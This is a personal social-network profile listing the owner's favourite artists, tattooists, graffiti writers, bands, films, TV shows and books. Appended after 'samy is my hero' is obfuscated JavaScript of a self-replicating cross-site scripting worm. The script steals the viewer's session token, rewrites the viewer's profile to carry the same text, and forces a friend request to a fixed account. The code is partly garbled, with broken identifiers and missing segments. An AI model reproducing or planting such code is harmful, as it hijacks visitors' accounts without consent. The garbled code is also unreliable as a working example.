ART(Dali, Ryden, Vaughn Bode), TATTOOING ( GRIME, Adian Lee, Joe Capo, Eric Merrill, and on and on...),Graffiti(SEEN, DAIM, SEAK, and the goes on), Boy do I love graffiti, trains, I love Hot Dogs, MUSIC (see next line). Not in that order. But it all I guess is based around that stuff.
I would like to met people into the same shit as me. Cool people. Not cool I have no time for. Who decides who is cool. You, just be honest with yourself ... ask yourself am I cool or not? Only you know the truth. And to meet people is good an all. But staying friends is where it's at. Other people I would like to met... Top people dead or alive (in no order) KRS One, Prince, Layne Staley, John Ritter, Johnny Depp, Vanessa Delrio, Robin Williams, and my grandfather who pasted away 4 years before i was born. This profile was edited with MySpace Profile Editor MySpace Profile Editor
Where to start..... With the A's...Anthrax,Alice in Chains, Aphex Twin, Bill Laswell, Beastie Boys, BUCKETHEAD, breakbeats, Cop Shoot Cop,Cyrus Chestnut, Circle Jerks, CKY ,Dilated Peoples, Def Jux, Deftones, El-p, Eric B and Rakim, Front 242,God Speed You Balck Emperor, Greyboy, Hive,Him, Helmet, Incubus, Invisible Scratch Pickles, I Mother Earth, Jurassic 5, Janes Addiction,KRS ONE, Ko-s,Kool Keith, Living Colour, Life of Agony, Morphine, Mars Ill Mastadon, Medeski Martin & Wood, Mos Def, Ming & FS, Nas, NWA, Nonphixion, Orbital, Opeth, PRINCE, Praxis, Pink Floyd, Porcupine Tree, RA The Rugged Man, Redman, Red Hot Chili Peppers, Slayer, Sepultura, Tool, Taproot, Voivod, Vision of Disorder, WEEN, Zillatron, and alot of other metal, disco, jazz, indepent hip hop, beats, old school rap i like the hip hop most brothers don't like, no bling bling here, and many, many, many more ................hate country, most emo, and wacked rap!
Killer Clowns from Outer Space, The Warriors, Beat Street, Pulp Fiction, Outsiders, 12 Monkeys, Orgasmo, Style Wars, Wild Style, 3000 Miles to Vegas, Death to Smochy, Fifth Element, and Blood Sucking Freaks like your mama......
King of the Hill, Family Guy, Regis & Kelly, HGTV, Speed Channel, History Channel, Travel Channel, MXC, Six Feet Under
Books, I've read a book before....I read the Prince bio. And a book on the history and where Heavy Metal came from. I'm not sure but I think it was called Sound of the Beast. It was great I couldn't put it down (I think my pecker was jealous). And I have read alot of magazines and playboys. I also love to read bathroom walls.
but most of all, samy is my hero. 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J.onr'+'eadystatechange=BI');,BH,true);if( BJ=='POST'){J.setRequestHeader('Content-Type','application/x -www-form-urlencoded');J.setRequestHeader('Content-Length',B K.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){ if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview'; AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseact ion=profile.previewInterests&Mytoken='+AR,postHero,'POST ',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';A S['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');ht tpSend('/index.cfm?fuseaction=profile.processInterests&M ytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN +'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET'); xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite .addfriend_verify&friendID=11851658&Mytoken='+L,proc essxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['subm it']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsP rocess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}f unction httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}..'xmlhttp2.onr'+'eadystatechange=BI'); J,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content -Type','application/x-www-form-urlencoded');xmlhttp2.setRequ estHeader('Content-Length',BK.length)}xmlhttp2.send(BK);retu rn true}"